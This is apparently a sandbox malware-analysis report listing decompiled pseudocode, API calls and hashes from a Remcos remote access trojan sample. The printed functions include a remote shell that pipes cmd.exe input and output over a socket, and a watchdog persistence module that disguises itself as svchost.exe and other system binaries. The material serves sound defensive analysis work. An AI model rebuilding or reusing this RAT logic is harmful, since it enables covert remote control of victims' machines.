                											__eflags = _t96 - 0x30650;
                											if(_t96 == 0x30650) {
                												goto L20;
                											} else {
                												__eflags = _t96 - 0x30660;
                												if(_t96 == 0x30660) {
                													goto L20;
                												} else {
                													__eflags = _t96 - 0x30670;
                													if(_t96 != 0x30670) {
                														goto L21;
                													} else {
                														goto L20;
                													}
                												}
                											}
                										}
                									}
                								}
                							}
                							__eflags = _v24 - 7;
                							_v40 = _v44;
                							_t87 = _v48;
                							_v16 = _t87;
                							_v36 = _t87;
                							if(_v24 >= 7) {
                								_t93 = 7;
                								_push(_t105);
                								asm("cpuid");
                								_t107 =  &_v56;
                								 *_t107 = _t93;
                								 *((intOrPtr*)(_t107 + 4)) = _t105;
                								 *((intOrPtr*)(_t107 + 8)) = 0;
                								 *(_t107 + 0xc) = _t123;
                								_t94 = _v52;
                								__eflags = _t94 & 0x00000200;
                								_v32 = _t94;
                								_t87 = _v16;
                								if((_t94 & 0x00000200) != 0) {
                									_t132 = _t130 | 0x00000002;
                									__eflags = _t132;
                									 *0x46fd20 = _t132;
                								}
                							}
                							__eflags = _t87 & 0x00100000;
                							if((_t87 & 0x00100000) != 0) {
                								 *0x46f010 =  *0x46f010 | 0x00000004;
                								 *0x46fd1c = 2;
                								__eflags = _t87 & 0x08000000;
                								if((_t87 & 0x08000000) != 0) {
                									__eflags = _t87 & 0x10000000;
                									if((_t87 & 0x10000000) != 0) {
                										asm("xgetbv");
                										_v28 = _t87;
                										_v24 = _t123;
                										__eflags = (_v28 & 0x00000006) - 6;
                										if((_v28 & 0x00000006) == 6) {
                											__eflags = 0;
                											if(0 == 0) {
                												_t90 =  *0x46f010; // 0x2f
                												_t91 = _t90 | 0x00000008;
                												 *0x46fd1c = 3;
                												__eflags = _v32 & 0x00000020;
                												 *0x46f010 = _t91;
                												if((_v32 & 0x00000020) != 0) {
                													_t92 = _t91 | 0x00000020;
                													__eflags = _t92;
                													 *0x46fd1c = 5;
                													 *0x46f010 = _t92;
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                						__eflags = 0;
                						return 0;
                					}
                				} else {
                					return 0;
                				}
                			}












































                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: caff369a3e44734e3409fc0f357ce8361766cfd02b4466f25ae0342934686fc9
                • Instruction ID: bcf894cbe7f558628445d92d8d60389314e0f69a1dd629ba4e5ad944aee8928b
                • Opcode Fuzzy Hash: caff369a3e44734e3409fc0f357ce8361766cfd02b4466f25ae0342934686fc9
                • Instruction Fuzzy Hash: 73F027B02042016BCB1C9B34CD5062A37969B98356F248F3FF01BD61E0DB3ACC85C60D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 16%
                			E00414230(void* __ecx, void* __edx) {
                				intOrPtr* _t1;
                				void* _t2;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                
                				_t1 =  *0x474a84;
                				_t7 = __edx;
                				_t6 = __ecx;
                				if(_t1 == 0) {
                					_t1 = E004140CD();
                					 *0x474a84 = _t1;
                				}
                				_t2 =  *_t1(_t6, _t7, 0, 0x470adc); // executed
                				_t8 = _t2;
                				__imp__#112(_t8);
                				return _t8;
                			}









                APIs
                • getaddrinfo.WS2_32(00000000,00000000,00000000,00470ADC,00473298,00000000,004144CF,00000000,00000001), ref: 00414252
                • WSASetLastError.WS2_32(00000000), ref: 00414257
                  • Part of subcall function 004140CD: GetSystemDirectoryA.KERNEL32 ref: 0041411C
                  • Part of subcall function 004140CD: LoadLibraryA.KERNEL32(?), ref: 0041415E
                  • Part of subcall function 004140CD: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041417E
                  • Part of subcall function 004140CD: FreeLibrary.KERNEL32(00000000), ref: 00414185
                  • Part of subcall function 004140CD: LoadLibraryA.KERNEL32(?), ref: 004141BD
                  • Part of subcall function 004140CD: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004141CF
                  • Part of subcall function 004140CD: FreeLibrary.KERNEL32(00000000), ref: 004141D6
                  • Part of subcall function 004140CD: GetProcAddress.KERNEL32(00000000,?), ref: 004141E5
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                • String ID:
                • API String ID: 1170566393-0
                • Opcode ID: 7eafb68998cab0a5018a28c9e38df1f5118c42bd2d226191dbc603db142c33c4
                • Instruction ID: 70d6a2cd6ec79b2462febf626053ae861496eecd2af2d304739a3cfd275dbb53
                • Opcode Fuzzy Hash: 7eafb68998cab0a5018a28c9e38df1f5118c42bd2d226191dbc603db142c33c4
                • Instruction Fuzzy Hash: 6ED012322411216ED2116769AC01AB7AB9CDFD6770B054077B504D3611D7A44C4146AC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E0044E954(void* __esi, void* __eflags) {
                				intOrPtr _v12;
                				void* __ecx;
                				char _t16;
                				void* _t17;
                				void* _t26;
                				void* _t28;
                				void* _t30;
                				char _t31;
                				void* _t33;
                				intOrPtr* _t35;
                
                				_push(_t26);
                				_push(_t26);
                				_t16 = E004443F4(_t26, 0x40, 0x30); // executed
                				_t31 = _t16;
                				_v12 = _t31;
                				_t28 = _t30;
                				if(_t31 != 0) {
                					_t2 = _t31 + 0xc00; // 0xc00
                					_t17 = _t2;
                					__eflags = _t31 - _t17;
                					if(__eflags != 0) {
                						_t3 = _t31 + 0x20; // 0x20
                						_t35 = _t3;
                						_t33 = _t17;
                						do {
                							_t4 = _t35 - 0x20; // 0x0
                							E00447304(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                							 *_t35 = 0;
                							_t35 = _t35 + 0x30;
                							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                							 *((char*)(_t35 - 0x24)) = 0xa;
                							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                							 *((char*)(_t35 - 0x22)) = 0;
                							__eflags = _t35 - 0x20 - _t33;
                						} while (__eflags != 0);
                						_t31 = _v12;
                					}
                				} else {
                					_t31 = 0;
                				}
                				E00445002(0);
                				return _t31;
                			}














                APIs
                  • Part of subcall function 004443F4: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446B4A,00000001,00000364,?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000), ref: 00444435
                • _free.LIBCMT ref: 0044E9C0
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap_free
                • String ID:
                • API String ID: 614378929-0
                • Opcode ID: e8cc168a206cb2f203358c90cc341d876996d2f60e2126ea3eb12d9ded59db87
                • Instruction ID: b43b9af27dcddb4849891f15c6ca459ff88ab6a8378577c786593469fbe10df3
                • Opcode Fuzzy Hash: e8cc168a206cb2f203358c90cc341d876996d2f60e2126ea3eb12d9ded59db87
                • Instruction Fuzzy Hash: E201D6B22003456BF721CE6AD845D5AFBD9FB85374F25051EE584832C0EA34A906C678
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E004443F4(void* __ecx, signed int _a4, signed int _a8) {
                				void* __esi;
                				void* _t8;
                				void* _t12;
                				signed int _t13;
                				void* _t15;
                				signed int _t18;
                				long _t19;
                
                				_t15 = __ecx;
                				_t18 = _a4;
                				if(_t18 == 0) {
                					L2:
                					_t19 = _t18 * _a8;
                					if(_t19 == 0) {
                						_t19 = _t19 + 1;
                					}
                					while(1) {
                						_t8 = RtlAllocateHeap( *0x470a5c, 8, _t19); // executed
                						if(_t8 != 0) {
                							break;
                						}
                						__eflags = E00443E46();
                						if(__eflags == 0) {
                							L8:
                							 *((intOrPtr*)(E0043EEAD())) = 0xc;
                							__eflags = 0;
                							return 0;
                						}
                						_t12 = E00441850(_t15, _t19, __eflags, _t19);
                						_pop(_t15);
                						__eflags = _t12;
                						if(_t12 == 0) {
                							goto L8;
                						}
                					}
                					return _t8;
                				}
                				_t13 = 0xffffffe0;
                				if(_t13 / _t18 < _a8) {
                					goto L8;
                				}
                				goto L2;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446B4A,00000001,00000364,?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000), ref: 00444435
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: fb9104f22dcedbe8120434fadbbdadfd72ec0fc3c5c24ebd2bf5bbd80fe2d0b8
                • Instruction ID: 9d40b9d846304a4da4b5929be8e6dfedca74db581f7d738e17eab2e9df3cce7a
                • Opcode Fuzzy Hash: fb9104f22dcedbe8120434fadbbdadfd72ec0fc3c5c24ebd2bf5bbd80fe2d0b8
                • Instruction Fuzzy Hash: 14F0E931605234A6FB211E629C06B5B7748AFC17B5F148027FC09A7690CA28DC0186ED
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Startup
                • String ID:
                • API String ID: 724789610-0
                • Opcode ID: 4b5b1acb0718588404019be5d9f15640a6bb1c21c3ccc0dc3f846b824dafbe4c
                • Instruction ID: e98c7a7dcee344fb28133bcb2ee241acd4b45dcbdfc1a3ef5d864df1fc63b674
                • Opcode Fuzzy Hash: 4b5b1acb0718588404019be5d9f15640a6bb1c21c3ccc0dc3f846b824dafbe4c
                • Instruction Fuzzy Hash: 7ED012325AD7088EE610AAB8AD0F8A47B5CC313A15F0003BA6CB9835D3F640571CC2AB
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: send
                • String ID:
                • API String ID: 2809346765-0
                • Opcode ID: a8d70cb1d05a31d846f06bfe6dacdd29f23318bb0f64ab28444019d680c4d177
                • Instruction ID: bfab3a08044aaf07d4c990dee58e7a6731fa9f306c9d2c0144e000b13adf200d
                • Opcode Fuzzy Hash: a8d70cb1d05a31d846f06bfe6dacdd29f23318bb0f64ab28444019d680c4d177
                • Instruction Fuzzy Hash: 56B092B9108302BFCA160B60DC0887A7EA6ABC8385B00882CF146411B0C636C460AB26
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E0040567A() {
                				char _v4;
                				void* _v16;
                				char _v28;
                				char _v52;
                				long _v56;
                				long _v60;
                				CHAR* _v64;
                				intOrPtr _v68;
                				void* _v72;
                				char _v76;
                				CHAR* _v84;
                				long _v92;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				long _t52;
                				void* _t56;
                				void* _t66;
                				void* _t70;
                				void* _t79;
                				CHAR* _t80;
                				CHAR* _t97;
                				void* _t105;
                				intOrPtr _t135;
                				signed int _t138;
                				signed int _t139;
                				long _t141;
                				char* _t143;
                				void* _t149;
                				void* _t155;
                				void* _t161;
                				void* _t168;
                
                				_t149 =  &_v68;
                				_t135 =  *((intOrPtr*)( *[fs:0x2c]));
                				_t139 = _t138 | 0xffffffff;
                				_t97 = 0;
                				if( *0x474c10 >  *((intOrPtr*)(_t135 + 4))) {
                					E00432CF1(0x474c10);
                					_t152 =  *0x474c10 - _t139;
                					if( *0x474c10 == _t139) {
                						E004046D7(0x474b70, 0x474c10, 0);
                						E0043307B(_t152, E00456897);
                						E00432CB2(_t139, 0x474c10);
                					}
                				}
                				if( *0x474bf0 >  *((intOrPtr*)(_t135 + 4))) {
                					E00432CF1(0x474bf0);
                					_t154 =  *0x474bf0 - _t139;
                					if( *0x474bf0 == _t139) {
                						E004020BF(_t97, 0x474c18);
                						E0043307B(_t154, E0045688D);
                						E00432CB2(_t139, 0x474bf0);
                					}
                				}
                				_t98 =  &_v52;
                				E004020BF(_t97,  &_v52);
                				_t143 = 0x472f78;
                				_t136 = CloseHandle;
                				_v64 = _t97;
                				_t155 =  *0x470ae6 - _t97; // 0x0
                				if(_t155 != 0) {
                					L12:
                					_v60 = _t97;
                					PeekNamedPipe( *0x474bf8, _t97, _t97, _t97,  &_v60, _t97);
                					if(_v60 <= _t97) {
                						_t149 = _t149 - 0x18;
                						E00402073(_t97, _t149, _t134, _t143, 0x464074);
                						_push(0x62);
                						_t139 = E00404A81(0x474b70, _t134, __eflags);
                						goto L21;
                					}
                					_push(_v60);
                					_t56 = E0043A620(_t98);
                					_t144 = _t56;
                					ReadFile( *0x474bf8, _t56, _v60,  &_v56, _t97);
                					if(_v56 <= _t97) {
                						L19:
                						L0043A61B(_t144);
                						_t143 = 0x472f78;
                						goto L21;
                					}
                					if(_v64 <= _t97) {
                						L17:
                						E00402073(_t97,  &_v28, _t134, _t144, _t144);
                						_t149 = _t149 - 0x18;
                						_t105 = _t149;
                						_push(_v60);
                						_push(_t97);
                						L18:
                						E00405A8B(_t97, _t105, _t134, _t144, _t165);
                						_t139 = E00404A81(0x474b70, _t134, _t165, 0x62,  &_v28);
                						E00401FB8();
                						goto L19;
                					}
                					_t66 = E0043A630(_t144, E00401F8B( &_v52), _v64);
                					_t149 = _t149 + 0xc;
                					_t165 = _t66;
                					if(_t66 != 0) {
                						goto L17;
                					}
                					E00402073(_t97,  &_v28, _t134, _t144, _t144);
                					_t149 = _t149 - 0x18;
                					_t105 = _t149;
                					_push(_v60 - _v68);
                					_push(_v68);
                					goto L18;
                				} else {
                					_t134 = "cmd.exe";
                					_t98 = 0x472f78;
                					_t70 = E00405AE5("cmd.exe");
                					_t156 = _t70;
                					if(_t70 == 0) {
                						L11:
                						_t161 =  *0x470ae6 - _t97; // 0x0
                						if(_t161 == 0) {
                							L26:
                							E00404E06(_t134);
                							CloseHandle( *0x474bf8);
                							CloseHandle( *0x474c14);
                							 *0x470ae6 = _t97;
                							_t97 = 1;
                							L27:
                							E00401FB8();
                							E00401FB8();
                							return _t97;
                						} else {
                							goto L12;
                						}
                						do {
                							goto L12;
                							L21:
                							_t38 =  <=  ? 0 :  *0x470ae7 & 0x000000ff;
                							_t98 = _t143;
                							 *0x470ae7 =  <=  ? 0 :  *0x470ae7 & 0x000000ff;
                							if(E0040245C() == 0) {
                								_v84 = _t97;
                							} else {
                								L0040535D(_t97, _t143, _t134, _t136, _t143, "\n");
                								E00401FA0( &_v76, _t143);
                								_t52 = E0040245C();
                								WriteFile( *0x474bf4, E00401F8B(_t143), _t52,  &_v92, _t97);
                								_t98 = _t143;
                								L00405A86(_t97, _t143, _t134, 0x464074);
                							}
                							Sleep(0x64);
                							_t168 =  *0x470ae7 - _t97; // 0x0
                						} while (_t168 != 0);
                						TerminateProcess(0x474bfc->hProcess, _t97);
                						CloseHandle( *0x474c00);
                						CloseHandle( *0x474bfc);
                						goto L26;
                					}
                					L00405A86(_t97, 0x474c18, "cmd.exe", E0043A9AA(_t97, _t156, "SystemDrive"));
                					L0040535D(_t97, 0x474c18, "cmd.exe", CloseHandle, 0x474c18, "\\");
                					0x474b18->nLength = 0xc;
                					 *0x474b20 = 1;
                					 *0x474b1c = _t97;
                					if(CreatePipe(0x474c0c, 0x474bf4, 0x474b18, _t97) == 0 || CreatePipe(0x474bf8, 0x474c14, 0x474b18, _t97) == 0) {
                						goto L27;
                					} else {
                						_t141 = 0x44;
                						E00435760(CloseHandle, 0x474b28, _t97, CreatePipe);
                						0x474b28->cb = _t141;
                						 *0x474b54 = 0x101;
                						 *0x474b58 = 0;
                						 *0x474b60 =  *0x474c0c;
                						_t79 =  *0x474c14;
                						 *0x474b64 = _t79;
                						 *0x474b68 = _t79;
                						_t80 = E00401F8B(0x474c18);
                						_t143 = 0x472f78;
                						 *0x470ae6 = CreateProcessA(_t97, E00401F8B(0x472f78), _t97, _t97, 1, _t97, _t97, _t80, 0x474b28, 0x474bfc) != 0;
                						L00405A86(_t97, 0x472f78, _t134, 0x464074);
                						 *0x470ae7 = 1;
                						E0040480D(0x474b70);
                						E004048A8(0x474b70, 0x474b70, 0x474b70);
                						_t149 = _t149 + 0xc - 0x18;
                						E004020D6(_t97, _t149, _t134,  *0x470ae6,  &_v4);
                						_push(0x93);
                						_t98 = 0x474b70;
                						_t139 = E00404A81(0x474b70, _t134,  *0x470ae6);
                						Sleep(0x12c);
                						goto L11;
                					}
                				}
                			}

                APIs
                • __Init_thread_footer.LIBCMT ref: 004056C6
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • __Init_thread_footer.LIBCMT ref: 00405703
                • CreatePipe.KERNEL32(00474C0C,00474BF4,00474B18,00000000,0046408C,00000000), ref: 00405796
                • CreatePipe.KERNEL32(00474BF8,00474C14,00474B18,00000000), ref: 004057AC
                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00474B28,00474BFC), ref: 0040581F
                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                  • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00472F78,00464090,00000062,00464074), ref: 004059C4
                • Sleep.KERNEL32(00000064,00000062,00464074), ref: 004059DE
                • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                • CloseHandle.KERNEL32 ref: 00405A03
                • CloseHandle.KERNEL32 ref: 00405A0B
                • CloseHandle.KERNEL32 ref: 00405A1D
                • CloseHandle.KERNEL32 ref: 00405A25
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                • String ID: (KG$SystemDrive$cmd.exe$pKG$pKG$pKG$pKG$pKG$x/G$x/G$x/G
                • API String ID: 2994406822-2676871211
                • Opcode ID: b228bb706cc0c523eab5acf379925d2fae165f293d7f99620159bbe8c345fd27
                • Instruction ID: 3b714476e132253386e4612caa6ffda136c57d83f36fbb8ab3cb78f76cc16c3c
                • Opcode Fuzzy Hash: b228bb706cc0c523eab5acf379925d2fae165f293d7f99620159bbe8c345fd27
                • Instruction Fuzzy Hash: AD91C371644205EFC700BB65AD52E7F36A8EB84344F01453FF949A72E2DB789C848B6E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E0041163A(void* __eflags) {
                				char _v28;
                				char _v36;
                				void* _v40;
                				char _v56;
                				void* _v64;
                				char _v76;
                				void* _v84;
                				char _v100;
                				char _v108;
                				char _v124;
                				char _v128;
                				char _v132;
                				char _v136;
                				char _v140;
                				long _v144;
                				char _v148;
                				char _v156;
                				char _v160;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				long _t41;
                				CHAR* _t44;
                				void* _t45;
                				void* _t51;
                				void* _t72;
                				intOrPtr _t83;
                				void* _t84;
                				void* _t92;
                				void* _t93;
                				void* _t110;
                				long _t158;
                				int _t184;
                				long _t186;
                				void* _t187;
                				char* _t189;
                				void* _t190;
                				void* _t192;
                				signed int _t193;
                				void* _t195;
                				void* _t202;
                
                				_t195 = (_t193 & 0xfffffff8) - 0x8c;
                				_push(_t187);
                				_t41 = GetCurrentProcessId();
                				_t178 = E00401F8B(0x473238);
                				if(E00412B5F(0x473238, _t42, "WD", _t41) != 0) {
                					_t44 = E00401F8B(0x473370);
                					_t184 = 0;
                					_t45 = OpenMutexA(0x100000, 0, _t44);
                					__eflags = _t45;
                					if(_t45 == 0) {
                						E004020BF(0x473238,  &_v76);
                						E00401EE4(0x473220);
                						E0041ADFE( &_v76);
                						E00401F66(0x473238,  &_v100);
                						__eflags = E0041AB12( &_v100);
                						if(__eflags != 0) {
                							_t51 = E0040415E(0x473238,  &_v124,  &_v76, _t192, L"\\SysWOW64\\");
                							_t180 = E0040415E(0x473238,  &_v56,  &_v76, _t192, E0043A99F(0x473238,  &_v124, __eflags, L"WinDir"));
                							E00401EF3( &_v108, _t53, _t187, E00402F85( &_v36, _t53, _t51));
                							E00401EE9();
                							E00401EE9();
                						} else {
                							_t93 = E0040415E(0x473238,  &_v28,  &_v76, _t192, L"\\system32\\");
                							_t180 = E0040415E(0x473238,  &_v56,  &_v76, _t192, E0043A99F(0x473238,  &_v28, __eflags, L"WinDir"));
                							E00401EF3( &_v108, _t95, _t187, E00402F85( &_v132, _t95, _t93));
                							E00401EE9();
                							E00401EE9();
                						}
                						E00401EE9();
                						E0040BEC3( &_v136);
                						E0040415E(0x473238,  &_v124, _t180, _t192, L"svchost.exe");
                						E00411DC0(0x473238,  &_v140, _t192, __eflags,  &_v128);
                						E00401EE9();
                						E0040415E(0x473238,  &_v132, _t180, _t192, L"rmclient.exe");
                						E00411DC0(0x473238,  &_v148, _t192, __eflags,  &_v136);
                						E00401EE9();
                						E0040415E(0x473238,  &_v140, _t180, _t192, L"fsutil.exe");
                						E00411DC0(0x473238,  &_v156, _t192, __eflags,  &_v144);
                						E00401EE9();
                						_t72 = E004021DA( &_v160);
                						__eflags = _t72;
                						if(_t72 != 0) {
                							while(1) {
                								_push(0x470d64);
                								_t189 = E00401F8B( &_v76);
                								_t83 = E00401EE4(E00401E45( &_v136, _t180, _t192, __eflags, _t184));
                								_t180 = _t189;
                								_t84 = E00416FDD(_t83, _t189);
                								__eflags = _t84;
                								if(_t84 != 0) {
                									break;
                								}
                								_t184 = _t184 + 1;
                								_t92 = E004021DA( &_v136);
                								__eflags = _t184 - _t92;
                								if(_t184 < _t92) {
                									continue;
                								}
                								goto L11;
                							}
                							E00402073(0x473238, _t195 - 0x18, _t180, _t192, "Watchdog module activated");
                							E00402073(0x473238, _t195, _t180, _t192, "i");
                							E0041A04A(0x473238, _t184);
                							Sleep(0x7d0);
                							_t158 =  *0x470d6c; // 0x0
                							goto L15;
                						}
                						L11:
                						E00402073(0x473238, _t195 - 0x18, _t180, _t192, "Watchdog launch failed!");
                						E00402073(0x473238, _t195, _t180, _t192, "E");
                						E0041A04A(0x473238, _t184);
                						CloseHandle( *0x470d74);
                						E00406150( &_v144);
                						E00401EE9();
                						E00401FB8();
                						_push(3);
                						_pop(1);
                					} else {
                						CloseHandle(_t45);
                						_t202 = _t195 - 0x18;
                						E00402073(0x473238, _t202, _t178, _t192, "Remcos restarted by watchdog!");
                						_t203 = _t202 - 0x18;
                						E00402073(0x473238, _t202 - 0x18, _t178, _t192, "i");
                						E0041A04A(0x473238, 0);
                						E00402073(0x473238, _t203 + 0x18, _t178, _t192, "Watchdog module activated");
                						E00402073(0x473238, _t203 + 0x18 - 0x18, _t178, _t192, "i");
                						E0041A04A(0x473238, 0);
                						CreateThread(0, 0, E00411D31, 0, 0, 0);
                						_t189 = "WDH";
                						_t110 = E00412831(E00401F8B(0x473238), _t189,  &_v160);
                						__eflags = _t110;
                						if(_t110 == 0) {
                							goto L1;
                						} else {
                							 *0x470d64 = OpenProcess(0x1fffff, 0, _v144);
                							E00412C91(E00401F8B(0x473238), __eflags, _t189);
                							_t158 = _v144;
                							L15:
                							L16();
                							asm("int3");
                							_push(_t189);
                							_push(_t184);
                							_t186 = _t158;
                							L17:
                							_t190 = OpenProcess(0x100000, 0, _t186);
                							WaitForSingleObject(_t190, 0xffffffff);
                							CloseHandle(_t190);
                							__eflags =  *0x470d4b;
                							if(__eflags != 0) {
                								E0041163A(__eflags, 0);
                							}
                							goto L17;
                						}
                						L19:
                					}
                				} else {
                					L1:
                				}
                				return 1;
                				goto L19;
                			}

                APIs
                • GetCurrentProcessId.KERNEL32 ref: 00411649
                  • Part of subcall function 00412B5F: RegCreateKeyA.ADVAPI32(80000001,00000000,t@F), ref: 00412B6D
                  • Part of subcall function 00412B5F: RegSetValueExA.KERNELBASE(t@F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B6CC,00464C08,00000001,000000AF,00464074), ref: 00412B88
                  • Part of subcall function 00412B5F: RegCloseKey.ADVAPI32(?,?,?,?,0040B6CC,00464C08,00000001,000000AF,00464074), ref: 00412B93
                • OpenMutexA.KERNEL32 ref: 00411689
                • CloseHandle.KERNEL32(00000000), ref: 00411698
                • CreateThread.KERNEL32 ref: 004116EE
                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041195D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                • String ID: 2G$82G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$p3G$rmclient.exe$svchost.exe$Cqt
                • API String ID: 3018269243-2657394792
                • Opcode ID: a7b09a16690db1f1b0b11ea9556301142734d4814bd9f430769ac868473874ee
                • Instruction ID: 2a728e4d40dbe9f2dcab1c582d9c47d784adc50530ded27a5339f3dd002cc33c
                • Opcode Fuzzy Hash: a7b09a16690db1f1b0b11ea9556301142734d4814bd9f430769ac868473874ee
                • Instruction Fuzzy Hash: 1A719E3160430157C204FB62DD9ADAE77A8AF90308F40093FF546621E2EE7C9A49C6AF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E0040730B(char* __edx, void* __eflags, intOrPtr _a4) {
                				char _v268;
                				char _v396;
                				char _v400;
                				char _v416;
                				void* _v420;
                				char _v424;
                				char _v432;
                				char _v440;
                				char _v444;
                				char _v448;
                				char _v468;
                				char _v476;
                				char _v480;
                				void* _v488;
                				char _v492;
                				char _v496;
                				char _v504;
                				char _v512;
                				char _v516;
                				char _v520;
                				void* _v524;
                				char _v528;
                				char _v536;
                				char _v540;
                				char _v544;
                				char _v548;
                				char _v552;
                				char _v556;
                				char _v560;
                				char _v564;
                				char _v568;
                				char _v572;
                				char _v576;
                				void* _v588;
                				void* _v596;
                				char _v600;
                				char _v612;
                				char _v620;
                				char _v624;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t166;
                				int _t182;
                				void* _t186;
                				void* _t190;
                				void* _t198;
                				int _t200;
                				int _t210;
                				int _t213;
                				void* _t229;
                				int _t231;
                				long _t237;
                				int _t240;
                				void* _t254;
                				signed int _t256;
                				void* _t267;
                				char* _t269;
                				void* _t270;
                				void* _t281;
                				void* _t297;
                				void* _t307;
                				void* _t324;
                				void* _t325;
                				void* _t338;
                				void* _t345;
                				void* _t349;
                				int _t350;
                				void* _t354;
                				void* _t365;
                				signed int _t379;
                				void* _t383;
                				void* _t388;
                				void* _t398;
                				int _t465;
                				void* _t614;
                				void* _t617;
                				short* _t640;
                				intOrPtr _t650;
                				intOrPtr _t651;
                				int _t652;
                				int _t654;
                				int _t656;
                				int _t657;
                				int _t658;
                				int _t659;
                				void* _t662;
                				void* _t664;
                				void* _t666;
                				void* _t668;
                				void* _t669;
                				void* _t670;
                				void* _t673;
                				void* _t674;
                				signed int _t675;
                				void* _t678;
                				void* _t679;
                				void* _t680;
                				void* _t683;
                				void* _t684;
                				void* _t685;
                				void* _t686;
                				void* _t688;
                				void* _t689;
                				void* _t690;
                				void* _t699;
                				void* _t700;
                				void* _t718;
                				void* _t719;
                				void* _t720;
                				void* _t722;
                				void* _t724;
                				void* _t732;
                				void* _t733;
                				void* _t734;
                				void* _t735;
                				void* _t736;
                				void* _t738;
                				signed int _t747;
                
                				_t737 = __eflags;
                				_t629 = __edx;
                				_push(0);
                				_t650 = _a4;
                				E004020D6(0,  &_v444, __edx, __eflags, _t650 + 0xc);
                				SetEvent( *(_t650 + 0x24));
                				_t651 =  *((intOrPtr*)(E00401F8B( &_v448)));
                				E00404182( &_v448,  &_v424, 4, 0xffffffff);
                				_t678 = (_t675 & 0xfffffff8) - 0x20c;
                				E004020D6(0, _t678, _t629, _t737, 0x472ec8);
                				_t679 = _t678 - 0x18;
                				E004020D6(0, _t679, _t629, _t737,  &_v440);
                				E0041A976( &_v576, _t629);
                				_t680 = _t679 + 0x30;
                				_t738 = _t651 - 0x8d;
